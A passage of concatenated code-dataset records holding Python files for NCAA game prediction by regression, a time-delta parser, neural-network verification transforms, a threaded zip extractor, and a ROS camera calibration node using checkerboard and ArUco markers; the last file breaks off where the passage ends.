{}\".format(name))\n plt.close()\n\ndef model_regress(X,y,base_estimator,X_final, y_final):\n #standardizer = XyScaler()\n #standardizer.fit(X, y)\n #X_std, y_std = standardizer.transform(X, y)\n # Fit estimator\n estimator = base_estimator\n estimator.fit(X, y)\n coeff = estimator.coef_\n #X_std_final, y_std_final = standardizer.transform(X_final, y_final)\n y_hat_final = estimator.predict(X_final)\n #X_final, y_hat_final = standardizer.inverse_transform(X_std_final,y_hat_std_final)\n rmse_final = rmse(y_final,y_hat_final)\n # Return coefficients\n return coeff, y_hat_final, rmse_final\n\nif __name__ == \"__main__\":\n #using ridge regression with dataframe 3 from model set C to get model and coefficients\n df3 = pd.read_pickle('data/reg_model_data_final3.pkl')\n endogc = df3['label_h_point_spread'].values\n exogsc2 = df3.drop(['label_h_point_spread','label_home_winner','year','home_fgp_var','home_ppg_var',\n 'away_fgp_var','away_ppg_var','home_ps_home','away_ps_away',\n 'home_fgpct','away_fgpct','home_3ppct','away_3ppct',\n 'awayteam_awaywp','hometeam_pt_sprd','hometeam_opp_ppg',\n 'awayteam_pt_sprd','awayteam_opp_ppg','home_pyth_wd','away_pyth_wd',\n 'hometeam_ps_var', 'awayteam_ps_var','home_ftpct','away_ftpct',\n 'hpsq','apsq','hometeam_homewp','home_3pa_perposs','away_3pa_perposs'],axis=1)\n #Applying that model to hold-out test data from NCAA Tournaments\n df_final_test = pd.read_pickle('data/tourney_model_data_final3.pkl')\n endog_final = df_final_test['label_h_point_spread'].values\n exogs_final = df_final_test.drop(['label_h_point_spread','label_home_winner','year','home_fgp_var','home_ppg_var',\n 'away_fgp_var','away_ppg_var','home_ps_home','away_ps_away',\n 'home_fgpct','away_fgpct','home_3ppct','away_3ppct',\n 'awayteam_awaywp','hometeam_pt_sprd','hometeam_opp_ppg',\n 'awayteam_pt_sprd','awayteam_opp_ppg','home_pyth_wd','away_pyth_wd',\n 'hometeam_ps_var', 
'awayteam_ps_var','home_ftpct','away_ftpct',\n 'hpsq','apsq','hometeam_homewp','home_3pa_perposs','away_3pa_perposs','DATE','Home','Away'],axis=1)\n\n coeff, y_hat_final, rmse_final = model_regress(exogsc2, endogc,LinearRegression(), exogs_final, endog_final)\n\n coeff_dict = {\"Variables\": exogsc2.columns.values, \"Coefficients\": coeff}\n coeff_df = pd.DataFrame(data = coeff_dict)\n print(tabulate(coeff_df.round(4), headers='keys', tablefmt='pipe'))\n\n #Tabling and Graphing ROC\n thresh = np.arange(-5,5)\n y_prec, y_rec, y_acc, y_spec, y_fpr = roc_curve(y_hat_final, endog_final, thresh)\n roc_dict = {\"Precision\":y_prec, \"Recall\": y_rec, \"Accuracy\": y_acc, \"Specificity\": y_spec, \"False Positive Rate\": y_fpr}\n roc_df = pd.DataFrame(data = roc_dict, index = thresh)\n print(tabulate(roc_df.round(3), headers='keys', tablefmt='pipe'))\n\n thresh2 = np.sort(y_hat_final)\n y_prec2, y_rec2, y_acc2, y_spec2, y_fpr2 = roc_curve(y_hat_final, endog_final, thresh2)\n roc_graph(y_hat_final, endog_final, thresh2, 'Final NCAA Game Prediction Using Pointspread')\n\n df_final_test['Predicted_Point_Spread'] = y_hat_final\n df_final_test.rename(index = str, columns={'label_h_point_spread':'Point_Spread_Actual','label_home_winner':'Home_team_winner'}, inplace=True)\n fig, (ax1, ax2) = plt.subplots(ncols=2, sharey=True)\n sns.lmplot('Predicted_Point_Spread','Point_Spread_Actual', fit_reg=False, data = df_final_test, hue = 'Home_team_winner')\n plt.savefig('images/real_v_predicted1.png')\n plt.close()\n sns.lmplot('Predicted_Point_Spread','Point_Spread_Actual', data = df_final_test)\n plt.savefig('images/real_v_predicted2.png')\n plt.close()\n","sub_path":"src/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"41742908","text":"from datetime import datetime, timedelta\n\n\nSECONDS_PER_UNIT = {\n \"s\": 1,\n \"m\": 60,\n \"h\": 3600,\n \"d\": 86400,\n \"w\": 604800,\n}\n\n\ndef to_time(s, now=None):\n \"\"\"\n Receives a delta of time string, and calculates a past time with that\n delta. The string is formatted as , where UNIT is one of s\n (seconds), m (minutes), h (hours), d (days), w (weeks).\n\n For example:\n\n Using 1 day as delta.\n >>> to_time('1d', now=datetime(2017, 02, 16, 2))\n datetime.datetime(2017, 2, 15, 2, 0)\n\n Using 1 week as delta.\n >>> to_time('1w', now=datetime(2017, 02, 16, 2))\n datetime.datetime(2017, 2, 9, 2, 0)\n\n It should fail when the format is not recognized.\n >>> to_time('1t')\n Traceback (most recent call last):\n ...\n SyntaxError: not a valid time unit: t, must be one of s, m, h, d, w\n\n :param s: the delta of time as an string\n :param now: optional now argument for easy testing\n :return: a resulting datetime object\n \"\"\"\n try:\n number = int(s[:-1])\n except ValueError:\n raise SyntaxError('not an integer number: %s' % s[:-1])\n\n unit = s[-1]\n if unit not in SECONDS_PER_UNIT:\n raise SyntaxError('not a valid time unit: %s, '\n 'must be one of s, m, h, d, w' % unit)\n\n if now is None:\n now = datetime.utcnow()\n else:\n if not isinstance(now, datetime):\n raise ValueError('`now` argument must be a datetime')\n\n return now - timedelta(seconds=number * SECONDS_PER_UNIT[unit])","sub_path":"DetectorSandBox/timeago.py","file_name":"timeago.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"125591406","text":"import numpy as np\nimport collections\nimport copy\n\n\nclass VectorVar:\n # W is weights matrix, b is bias vector, dim is dimensions of vector\n def __init__(self, name, dim, W=None, b=None, cf=1):\n self.name = name\n self.dim = dim\n if W is None:\n self.W = np.identity(dim)\n else:\n self.W = W\n if b is None:\n self.b = np.zeros((dim))\n else:\n self.b = b\n self.cf = cf\n\n\nclass Term:\n # vars is a list of VectorVars, cfs is the list of corresponding coefficients, and isAbs is whether term is in absolute value\n # caseConds is set of case conditions, which are triples, first element is W, second element is var, third element is b\n def __init__(self, name, vars, isAbs=False, cf=1, caseConds=[]):\n self.varArray = vars\n self.vars = {var.name: var for var in vars}\n self.cf = cf\n self.isAbs = isAbs\n self.caseConds = caseConds\n self.name = name\n\n def copy(self):\n vars = [VectorVar(var.name, var.dim, np.copy(var.W), np.copy(var.b), var.cf) for var in self.varArray]\n return Term(self.name, vars, self.isAbs, self.cf, copy.deepcopy(self.caseConds))\n\n\nclass Condition:\n def __init__(self, terms):\n # self.terms = terms\n self.termNameMap = {term.name: term for term in terms}\n\n\ndef condsToString(conds):\n for disj, cond in enumerate(conds):\n s = ''\n if disj != 0:\n s += '\\nv '\n\n termConds = ''\n\n for i, term in enumerate(cond.termNameMap.values()):\n if term.cf == 0:\n break\n\n if i != 0:\n s += ' + '\n\n if term.cf != 1:\n s += str(term.cf)\n\n if term.isAbs:\n s += '|'\n else:\n s += '('\n\n for j, var in enumerate(term.vars):\n if j != 0:\n s += ' + '\n if term.vars[var].cf != 1:\n s += str(term.vars[var].cf)\n s += '('\n s += str(term.vars[var].W) + term.vars[var].name + ' + ' + str(term.vars[var].b)\n # s += 'W' + term.vars[var].name + ' + b'\n\n s += ')'\n\n if term.isAbs:\n s += '|'\n else:\n s += ')'\n\n for varCond in term.caseConds:\n termConds += ' ^ ('\n\n for l, c in enumerate(varCond):\n if l != 0 and l % 3 != 1:\n termConds += ' + '\n termConds += str(c)\n # if varCond[l] < 0:\n # \ttermConds += '-'+ varCond[0] + '_' + str((varCond[l]+1)*-1)\n # else:\n # \ttermConds += varCond[0] + '_' + str(varCond[l]-1)\n\n termConds += ' >= 0)'\n\n s += ' >= 0 '\n s += termConds\n print(s)\n\n\n# def matmul(conds, termName, var, W):\n# \tfor cond in conds:\n# \t\tcond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(W)\n# \t\tcond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n\n\n\n#for each of these transformations, make sure var dim changes (not completed)\n\ndef matmulTerm(conds, termName, W):\n for cond in conds:\n for var in cond.termNameMap[termName].vars:\n cond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(W)\n cond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n for i in range(len(cond.termNameMap[termName].caseConds)):\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][0] = cond.termNameMap[termName].caseConds[i][0].dot(W)\n # this would be a place where turning caseConds into a map with var as key would be more efficient\n\n\n# def biasAdd(conds, termName, var, b):\n# \tfor cond in conds:\n# \t\tcond.termNameMap[termName].vars[var].b = cond.termNameMap[termName].vars[var].b + cond.termNameMap[termName].vars[var].W.dot(b)\n\ndef biasAddTerm(conds, termName, b):\n for cond in conds:\n for var in cond.termNameMap[termName].vars:\n 
cond.termNameMap[termName].vars[var].b = cond.termNameMap[termName].vars[var].b + \\\n cond.termNameMap[termName].vars[var].W.dot(b)\n for i in range(len(cond.termNameMap[termName].caseConds)):\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][2] = cond.termNameMap[termName].caseConds[i][2] + \\\n cond.termNameMap[termName].caseConds[i][0].dot(b)\n\n # this would be a place where turning caseConds into a map with var as key would be more efficient\n\n\n\n#all of the relu methods are not optimized to work together, loops through conds many more times than needed\n# comp is component of vectorVar to apply relu to\ndef relu(conds, termName, var, comp):\n for i in range(len(conds)):\n cond = conds.pop()\n\n # I think this can be made more efficient by just reusing the condition instead of making copy\n cond1 = Condition(cond.termNameMap.values())\n term1 = cond1.termNameMap[termName].copy()\n cond1.termNameMap[termName] = term1\n\n cond2 = Condition(cond.termNameMap.values())\n term2 = cond2.termNameMap[termName].copy()\n cond2.termNameMap[termName] = term2\n\n dim = term1.vars[var].dim\n term1.caseConds.append([np.identity(dim)[comp], var, 0])\n term2.caseConds.append([-1*np.identity(dim)[comp], var, 0])\n\n term2.vars[var].W[:,comp] = 0\n\n conds.appendleft(cond2)\n conds.appendleft(cond1)\n\n\ndef reluLayer(conds, termName, var):\n layerSize = conds[-1].termNameMap[termName].vars[var].dim\n for i in range(layerSize):\n relu(conds, termName, var, i)\n\n\ndef reluLayerTerm(conds, termName):\n for var in conds[-1].termNameMap[termName].vars:\n layerSize = conds[-1].termNameMap[termName].vars[var].dim\n for i in range(layerSize):\n relu(conds, termName, var, i)\n\ndef conv2DLayerTerm(stride, W, xdim=None, ydim=None, termName=None, conds=None):\n\n for index in range(len(conds)):\n cond = conds[index]\n for var in cond.termNameMap[termName].vars:\n\n reshapedW = np.zeros((ydim[1]*ydim[2]*ydim[3],xdim[0]*xdim[1]*xdim[2]))\n\n for filter in range(ydim[3]):\n linearConvs = np.zeros((xdim[2],((xdim[1] * (W.shape[0] - 1)) + W.shape[1])))\n for i in range(W.shape[0]):\n for j in range(W.shape[1]):\n for k in range(W.shape[2]):\n linearConvs[k][(i * xdim[1]) + j] += W[i][j][k][filter]\n\n offset = 0\n resets = 0\n for i in range(ydim[1] * ydim[2]):\n if offset + W.shape[1] > xdim[1]:\n resets += stride[0]\n offset = 0\n for j in range(W.shape[2]):\n reshapedW[filter + (i * ydim[3])][(resets * xdim[1]) + offset + (j * xdim[1]): (resets * xdim[1]) + offset + len(linearConvs[j]) + (j * xdim[1])] = linearConvs[j]\n offset += stride[1]\n\n cond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(reshapedW)\n # cond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n for i in range(len(cond.termNameMap[termName].caseConds)):\n #this can be made more efficient with restructuring of caseConds\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][0] = cond.termNameMap[termName].caseConds[i][0].dot(reshapedW)\n\n#inspired by ELINA's maxpool_approx\ndef maxpoolLayerTerm(poolDim, inputDim, termName, conds):\n outputDim = [inputDim[0]//poolDim[0], inputDim[1]//poolDim[1], inputDim[2]]\n o12 = outputDim[1] * outputDim[2]\n i12 = inputDim[1] * inputDim[2]\n numOut = outputDim[0] * outputDim[1] * outputDim[2]\n W_mp = np.zeros((inputDim[0] * i12, inputDim[0] * i12))\n # reshapedOrder = np.zeros(len(W_mp))\n counter = 0\n for outPos in range(numOut):\n outX = outPos 
// o12\n        outY = (outPos-outX*o12) // outputDim[2]\n        outZ = outPos - outX * o12 - outY * outputDim[2]\n        inpX = outX * poolDim[0]\n        inpY = outY * poolDim[1]\n        inpZ = outZ\n        inpPos = inpX*i12 + inpY*inputDim[2] + inpZ\n        for xShift in range(poolDim[0]):\n            for yShift in range(poolDim[1]):\n                poolCurrDim = inpPos + xShift*i12 + yShift*inputDim[2]\n                W_mp[counter][poolCurrDim] = 1\n                # reshapedOrder[counter] = poolCurrDim\n                counter += 1\n\n    for i in range(len(conds)):\n        cond = conds.pop()\n        for var in cond.termNameMap[termName].vars:\n            # push the case-split conditions back onto the same deque, as relu does\n            maxpoolHelper(conds, np.array([]), W_mp, poolDim, 0, np.identity(inputDim[0] * i12), cond, termName, var)\n\n\ndef maxpoolHelper(maxpoolConds, caseConds, W_mp, poolDim, depth, maxMatrix, cond, termName, var):\n    if depth == len(W_mp) // (poolDim[0] * poolDim[1]):\n        W = maxMatrix.dot(W_mp)\n        newCond = Condition(cond.termNameMap.values())\n        newTerm = newCond.termNameMap[termName].copy()\n        newCond.termNameMap[termName] = newTerm\n\n        #I have to fix the dimension changes in each of the backwards transformations\n        # dim = term1.vars[var].dim\n\n        for i in range(len(caseConds)):\n            for j in range(1,len(caseConds[0])):\n                newTerm.caseConds.append([np.identity(len(W[0]))[caseConds[i][0]], var, 0, np.identity(len(W[0]))[caseConds[i][j]], var, 0]) #find a better way to get component of identity matrix, same with relu transformation\n\n        newTerm.vars[var].W = newTerm.vars[var].W.dot(W)\n        maxpoolConds.appendleft(newCond)\n        return\n\n    for i in range(poolDim[0]*poolDim[1]):\n        # index block for this pool window (generalizes the previous hard-coded 2x2 arrays)\n        pool = np.arange(poolDim[0]*poolDim[1]) + depth * poolDim[0] * poolDim[1]\n        newConds = np.append(pool[i], np.delete(pool, i))\n        if len(caseConds) == 0:\n            maxpoolHelper(maxpoolConds, np.vstack((newConds,)), W_mp, poolDim, depth + 1, np.delete(maxMatrix, newConds[1:], axis=0), cond, termName, var)\n        else:\n            maxpoolHelper(maxpoolConds, np.vstack((caseConds, newConds)), W_mp, poolDim, depth + 1, np.delete(maxMatrix, newConds[1:], axis=0), cond, termName, var)\n\n\n\n\n\n\n\n\n\n","sub_path":"tf_verify/backwardprop.py","file_name":"backwardprop.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"224540700","text":"import argparse\nimport logging\nimport zipfile\nimport os\nfrom multiprocessing import *\nfrom threading import Thread\nimport time\nimport sys\n\ndef unzip(filename, dir, i):\n zf = zipfile.ZipFile(filename)\n dir = os.path.dirname(os.path.abspath(filename))\n # uncompress_size = sum((file.file_size for file in zf.infolist()))\n # extracted_size = 0\n\n for file in zf.infolist():\n try:\n zf.extract(file, dir)\n except Exception as e:\n raise\n print(e) #logging...\n # extracted_size += file.file_size\n # print(\"%s %%\" % int(extracted_size * 100/uncompress_size))\n\n\ndef start_unzip(i, q, terminated, lock):\n while(not q.empty()):\n try:\n file = q.get()\n # os.system('cls')\n logging.debug('Extracting \\'%s\\' from thread %d', file, i)\n p = Process(target=unzip, args=(file, dir, i,))\n p.start()\n p.join(args.ttimeout)\n if(p.is_alive()):\n p.terminate()\n lock.acquire()\n terminated += 1\n lock.release()\n logging.info('\\'%s\\' reached timeout', file)\n sys.stdout.write(\"\\rProcessing: %d/%d | Terminated: %d\" % (total-q.qsize(), total, terminated))\n except Exception as e:\n logging.error('\\'%s\\': %s', file, e)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", help=\"number of threads\", type=int, default=3)\n parser.add_argument(\"-log\", nargs='?', help=\"logfile name\", default=\"log.txt\")\n parser.add_argument(\"-ttimeout\", help=\"ttimeout in sec for a zip file\", type=float, default=60)\n parser.add_argument(\"-gtimeout\", help=\"total ttimeout in sec\", type=float, default=180)\n parser.add_argument(\"dir\", help=\"dir with zip files\")\n\n args = parser.parse_args()\n args.log = args.log if args.log!=None else \"log.txt\"\n\n logging.basicConfig(filename=args.log, format='[%(asctime)s]\\t[%(levelname)s]\\t\\t%(message)s', level=logging.DEBUG)\n logging.info('%d unzipping threads running', args.t)\n logging.info('%s set as logfile', args.log)\n logging.info('%ds - timeout for a single zip file', args.ttimeout)\n logging.info('%ds - total timeout', args.gtimeout)\n logging.info('Start unzipping ...')\n\n files = Queue()\n terminated = 0\n\n for file in os.listdir(args.dir):\n if file.endswith(\".zip\"):\n f = os.path.join(args.dir, file)\n files.put(f)\n total = files.qsize()\n\n logging.info('Total nr of zipfiles: %d', files.qsize())\n\n lock = Lock()\n t = [0 for i in range(0, args.t)]\n ttime = time.time()\n # os.system('cls')\n\n for i in range(0, args.t):\n try:\n logging.debug('Thread %d starting', i)\n t[i] = Thread(target=start_unzip, args=(i, files, terminated,lock,))\n t[i].start()\n except Exception as e:\n logging.error('Thread %d: %s', i, e)\n\n active = True\n while(time.time()-ttime <= args.gtimeout and active):\n active = False\n for th in t:\n if(th.is_alive()):\n active = True\n time.sleep(1)\n else:\n sys.exit()\n\n if(active):\n logging.info('Reached timeout')\n","sub_path":"munzip.py","file_name":"munzip.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337087333","text":"#!/usr/bin/env python\n#\n# pydetectobject.py\n#\n# Run a Cascade Object Detector in OpenCV.\n#\n# Subscribers: /image Source image, to be remapped\n# Publishers: /detector/image Destination image\n# /detector/??? Coordinates??\n#\n# Services: none\n#\n\n# ROS Imports\nimport rospy\nimport sensor_msgs.msg\nimport cv2\nimport cv_bridge\nimport numpy as np\nfrom sensor_msgs.msg import Image\nfrom boogaloo.msg import Detection, Activation\nfrom geometry_msgs.msg import Vector3\nfrom sensor_msgs.msg import CameraInfo\nfrom camera_calibration.calibrator import ChessboardInfo\nfrom camera_calibration.calibrator import Calibrator\nfrom cv2 import aruco\nfrom joblib import load\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport rospkg\nimport os\nimport errno\n\ndef intrinsic_params_from_file():\n # Grab a camera_info message, change topic as needed.\n msg = rospy.wait_for_message('/cam_feed/camera_info', CameraInfo)\n\n # Check/grab the camera matrix.\n if (msg.K[0] == 0 or msg.K[1] != 0 or msg.K[2] == 0 or\n msg.K[3] != 0 or msg.K[4] == 0 or msg.K[5] == 0 or\n msg.K[6] != 0 or msg.K[7] != 0 or msg.K[8] != 1):\n rospy.logerr(\"Camera Intrinsic Parameters strangely formatted!\")\n rospy.signal_shutdown(\"Camera incorrectly calibrated\")\n return\n K = np.float64(msg.K).reshape(3,3)\n\n # Check/grab the distortion model.\n D = np.float64(msg.D)\n return K, D\n\nCAP_HEIGHT = 0.20\nBAND_HEIGHT = 0.0254 * 3\nRIM_HEIGHT = 0.0254 * 2.25\n\n\nclass CheckerboardCalibrator:\n def __init__(self):\n # Define the Checkerboard. Note the OpenCV detector\n # apparently assumes more columns than rows.\n self.board = ChessboardInfo()\n self.board.n_cols = 4\n self.board.n_rows = 3\n self.board.dim = 0.0254 * (1 + 7 / 8.0)\n self.K, self.D = intrinsic_params_from_file()\n self.bridge = cv_bridge.CvBridge()\n\n # Instantiate a Calibrator, to extract corners etc.\n self.calibrator = Calibrator([self.board])\n self.R_cam_wrt_world = None\n self.x_cam_wrt_world = None\n self.R_world_wrt_cam = None\n self.x_world_wrt_cam = None\n\n\n def calibrate_checkerboard(self, image, display_image):\n # Test for the presense of a checkerboard and pull out the\n # corners as a list of (u,v) data.\n #gray = self.calibrator.mkgray(image)\n # Grayscale the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n (ok, corners, board) = self.calibrator.get_corners(gray)\n if not ok:\n print(\"No matching checkerboard...\")\n return [], [], display_image\n corners = corners.reshape(-1,2)\n\n # Set the (X,Y,Z) data for each corner. 
This presumes the\n # checkerboard is on the Z=0 plane.\n ## 02/28 measurements\n ## x = 82.5, y = -28.9\n ## X_CENTER = 0.834\n ## Y_CENTER = -0.331\n\n # 03/04 measurements\n X_CENTER = 0.8285\n Y_CENTER = -0.3165\n \"\"\"\n Robot thinks\n checkerboard 0.838 x, -0.311 y\n aruco large square, width 6 inchs / 15.2 cm\n 18 aruco top right corner 0.791 x, -0.080 y\n 12 aruco top right 0.294 x, 0.194\n 42 topleft corner of far 0.363 x, -0.310\n 42 topright corner of far 0.363 - 0.152 x, -0.310\n \"\"\"\n\n \"\"\"\n Hand measured\n checkerboard, 0.7735 + 0.055 = 0.8285, 0.3165\n 18, 0.727 + 0.055 = 0.7914, -0.085\n 12 0.2395 + 0.055 = 0.2945, 0.192\n 42 0.148 + 0.055 = 0.203,-0.318\n \"\"\"\n\n xyz = np.zeros((len(corners), 3))\n for r in range(board.n_rows):\n for c in range(board.n_cols):\n i = r*board.n_cols + c\n xyz[i][0] = board.dim * (c - (board.n_cols-1)/2.0) + X_CENTER\n xyz[i][1] = board.dim * ((board.n_rows-1)/2.0 - r) + Y_CENTER\n xyz[i][2] = 0\n\n display_image = cv2.drawChessboardCorners(\n image,\n (self.board.n_cols, self.board.n_rows),\n corners,\n patternWasFound=True\n )\n\n # Really these are lists of (u,v) and (x,y,z)\n return xyz, corners, display_image\n\n\n def calibrate_aruco_cv(self, image, display_image):\n # aruco variables\n ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)\n MARKER_LENGTH = 0.152\n TOP_RIGHT_CORNER_IND = 1\n \"\"\"\n Hand measured\n 18, 0.727 + 0.055 = 0.7814, -0.085\n 12 0.2395 + 0.055 = 0.2945, 0.192\n 42 0.148 + 0.055 = 0.203,-0.318\n \"\"\"\n # Location of top right corner\n XYZ_BY_ID = {\n 18: (0.791, -0.085, 0),\n 12: (0.2945, 0.192, 0),\n 42: (0.203, -0.318, 0)\n }\n\n # Grayscale the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Find aruco markers in the query image, top left corner\n corners, ids, _ = aruco.detectMarkers(\n image=gray,\n dictionary=ARUCO_DICT)\n \n verified_corners = []\n verified_xyz = []\n if ids is None:\n print(\"No aruco markers found\")\n return [], [], display_image\n for i, aruco_id in enumerate(ids.flatten()):\n if aruco_id in XYZ_BY_ID:\n # corners matrix is [aruco marker][0][corner][x,y]]\n verified_corners.append(corners[i][0][TOP_RIGHT_CORNER_IND].flatten())\n verified_xyz.append(XYZ_BY_ID[aruco_id])\n\n # convert to numpy\n verified_corners = np.array(verified_corners)\n verified_xyz = np.array(verified_xyz)\n\n # Outline the aruco markers found in our query image\n display_image = aruco.drawDetectedMarkers(\n image=display_image,\n corners=corners,\n ids=ids)\n\n return verified_xyz, verified_corners, display_image\n\n\n def calibrate_charucoboard(self, image, display_image):\n\n # ChAruco board variables\n CHARUCOBOARD_ROWCOUNT = 5\n CHARUCOBOARD_COLCOUNT = 5\n ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_50)\n SQUARE_LENGTH = (1+5.0/8) * 0.0254\n MARKER_LENGTH = (1+9.0/32) * 0.0254\n # Create constants to be passed into OpenCV and Aruco methods\n print(\n CHARUCOBOARD_COLCOUNT > 1,\n CHARUCOBOARD_ROWCOUNT > 1,\n SQUARE_LENGTH > MARKER_LENGTH\n )\n CHARUCO_BOARD = aruco.CharucoBoard_create(\n squaresX=CHARUCOBOARD_COLCOUNT,\n squaresY=CHARUCOBOARD_ROWCOUNT,\n squareLength=SQUARE_LENGTH,\n markerLength=MARKER_LENGTH,\n dictionary=ARUCO_DICT)\n\n # Create the arrays and variables we'll use to store info like corners and IDs from images processed\n corners_all = [] # Corners discovered in all images processed\n ids_all = [] # Aruco ids corresponding to corners discovered\n image_size = None # Determined at runtime\n\n # Grayscale the image\n gray = cv2.cvtColor(image, 
cv2.COLOR_BGR2GRAY)\n\n        # Find aruco markers in the query image\n        corners, ids, _ = aruco.detectMarkers(\n            image=gray,\n            dictionary=ARUCO_DICT)\n\n        # Outline the aruco markers found in our query image\n        display_image = aruco.drawDetectedMarkers(\n            image=display_image,\n            corners=corners)\n\n        # Get charuco corners and ids from detected aruco markers\n        response, charuco_corners, charuco_ids = aruco.interpolateCornersCharuco(\n            markerCorners=corners,\n            markerIds=ids,\n            image=gray,\n            board=CHARUCO_BOARD)\n\n        # If a Charuco board was found, let's collect image/corner points\n        # Requiring more than 5 interpolated corners\n        if response > 5:\n            # Add these corners and ids to our calibration arrays\n            corners_all.append(charuco_corners)\n            ids_all.append(charuco_ids)\n\n            # Draw the Charuco board we've detected to show our calibrator the board was properly detected\n            display_image = aruco.drawDetectedCornersCharuco(\n                image=display_image,\n                charucoCorners=charuco_corners,\n                charucoIds=charuco_ids)\n\n            return [], corners_all, display_image\n\n        else:\n            print(\"Not able to detect a charuco board in image\")\n            return [], [], display_image\n\n\n    def calibrate_all(self, ros_image, set_params=True):\n        # Convert into OpenCV image.\n        image = self.bridge.imgmsg_to_cv2(ros_image, \"bgr8\")\n        display_image = image.copy()\n        xyz_list = []\n        corners_list = []\n\n        calibration_funcs = [\n            self.calibrate_checkerboard,\n            self.calibrate_aruco_cv\n        ]\n        for calibration_func in calibration_funcs:\n            xyz, corners, display_image = calibration_func(image, display_image)\n            xyz_list.extend(xyz)\n            corners_list.extend(corners)\n\n        # Convert to np\n        xyz_list = np.array(xyz_list)\n        corners_list = np.array(corners_list)\n\n        if set_params:\n            print(xyz_list)\n            print(corners_list)\n            self.locate_camera(xyz_list, corners_list)\n\n        return display_image\n\n\n    #\n    # Determine the camera position/orientation\n    #\n    # Note in the vision world, folks are interested in where objects\n    # are relative to the camera. So we will need to invert the\n    # orientation/position to get the camera w.r.t. world (which is our\n    # object).\n    #\n    def locate_camera(self, xyz, corners): \n        # Compute the world frame w.r.t. camera.\n        ok, rvec, tvec = cv2.solvePnP(xyz, corners, self.K, self.D)\n        if not ok:\n            print(\"Problem locating the camera!\")\n            return\n        (self.R_world_wrt_cam, _) = cv2.Rodrigues(rvec)\n        self.x_world_wrt_cam = tvec\n\n        # Convert into the camera frame w.r.t. world.\n        self.R_cam_wrt_world = self.R_world_wrt_cam.transpose()\n        self.x_cam_wrt_world = - np.matmul(self.R_cam_wrt_world, self.x_world_wrt_cam)\n        print(\"actual\", self.x_cam_wrt_world)\n        #self.x_cam_wrt_world = np.array([[2], [-0.125], [1.18]])\n\n        \"\"\"\n        Hand measured\n        checkerboard, 0.7735 + 0.055 = 0.8285, 0.3165\n        18, 0.727 + 0.055 = 0.7814, -0.085\n        12 0.2395 + 0.055 = 0.2945, 0.192\n        42 0.148 + 0.055 = 0.203,-0.318\n        \"\"\"\n\n        # Report.\n        print(\"r cam wrt world\")\n        print(self.R_cam_wrt_world)\n        print(\"cam loc should be:\", [1.335, 0.125, 1.18])\n        print(\"Cam loc (x, y, z relative to 0,0,0): %6.3f, %6.3f, %6.3f\" \n              % tuple(self.x_cam_wrt_world.reshape(3)))\n\n        self.check_calibration(corners)\n\n    #\n    # Undistort\n    #\n    # Compute the normalized (image) coordinates from the pixels\n    #\n    def undistort(self, uv, obj_height=0.0):\n        # Map to the normalized (image) coordinates. As above, the API\n        # assumes a set of lists of points, so reshape accordingly.\n        #print(uv.reshape(1,-1,2), uv.reshape(1,-1,2).shape)\n        #raise Exception\n        xybar = cv2.undistortPoints(uv.reshape(1,-1,2).astype(float), self.K, self.D).reshape(2)\n        #print('xbar, ybar:', xybar)\n\n        # Now map into the world. Here I am assuming zw = 0...\n        Rc = self.R_cam_wrt_world\n        xc = self.x_cam_wrt_world.reshape(3)\n\n        lam = -xc[2] / (Rc[2][0]*xybar[0] + Rc[2][1]*xybar[1] + Rc[2][2])\n        xw = lam*(Rc[0][0]*xybar[0] + Rc[0][1]*xybar[1] + Rc[0][2]) + xc[0]\n        yw = lam*(Rc[1][0]*xybar[0] + Rc[1][1]*xybar[1] + Rc[1][2]) + xc[1]\n\n        # Adjust for the height of the object\n        cam_height = self.x_cam_wrt_world[2]\n        factor = obj_height / cam_height\n        obj_to_cam_xy = (\n            self.x_cam_wrt_world[0] - xw,\n            self.x_cam_wrt_world[1] - yw\n        )\n        xw += obj_to_cam_xy[0] * factor\n        yw += obj_to_cam_xy[1] * factor\n\n        # hacky x axis correction for bloating\n        xw += 0.025 / max(1, (xw - 0.10) * 100) + 0.01\n        return (xw, yw)\n\n    def undistort_cap(self, uv):\n        return self.undistort(uv, CAP_HEIGHT)\n\n    def undistort_band(self, uv):\n        return self.undistort(uv, BAND_HEIGHT)\n\n    def undistort_rim(self, uv):\n        return self.undistort(uv, RIM_HEIGHT)\n\n    def check_calibration(self, corners):\n        # Pick a (u,v) pair. I used the top-left corner for\n        # testing, which is (-3.5, 2.5) * 0.0254 * 29 / 32\n        uv = corners[0]\n        xw, yw = self.undistort(uv)\n        X_CENTER = 0.8285\n        Y_CENTER = -0.3165\n        # Check the location in number of squares...\n        n_x = (xw - X_CENTER) / self.board.dim\n        n_y = (yw - Y_CENTER) / self.board.dim\n        print('location of top left corner in number of squares', [n_x, n_y],\n              'we expect -1.5 and 1')\n\n\n#\n# Detector Node Class\n#\n\nclass Detector:\n\n    def __init__(self):\n        # Instantiate a calibrator\n        self.checkCalibrator = CheckerboardCalibrator()\n\n        # Set up the OpenCV Bridge.\n        self.bridge = cv_bridge.CvBridge()\n\n        # Pick the topic 